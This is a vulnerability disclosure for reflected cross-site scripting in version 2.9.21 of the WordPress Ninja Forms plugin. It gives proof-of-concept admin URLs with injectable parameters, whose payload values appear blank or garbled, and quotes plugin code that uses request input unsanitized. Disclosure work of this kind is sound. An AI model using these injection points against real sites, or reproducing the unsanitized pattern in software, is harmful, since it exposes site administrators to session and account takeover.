Title: WordPress 'Ninja Forms' Plugin - XSS Version: 2.9.21 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2015/07/14 Download: https://wordpress.org/plugins/ninja-forms/ Contacted authors: 2015/07/14 ========================================================== ## Description: ========================================================== Forms created with a simple drag and drop interface. Contact forms, Email collection forms, or any other form you want on your WordPress site. ## Reflected XSS: ========================================================== Certain parameters are used unsanitized in the admin pages. PoC: Log in as admin and visit one of the following URLs: [URL]/wp-admin/admin.php?page=nf-processing&title= [URL]/wp-admin/admin.php?page=nf-processing&action= [URL]/wp-admin/admin.php?page=ninja-forms&tab=notifications&form_id=7&id=">¬ification-action=new It looks like there are more vulnerabilities, since the plugin has code like this: file: subs-cpt.php ... l.883 if ( isset ( $_REQUEST['ref'] ) ) { l.884 $ref = $_REQUEST['ref']; l.885 } else if ( get_transient( 'nf_sub_edit_ref' ) ) { l.886 $ref = get_transient( 'nf_sub_edit_ref' ); l.887 } else { l.888 $ref = ''; l.889 } l.890 ?> l.891 ... ## Solution ========================================================== No fix available.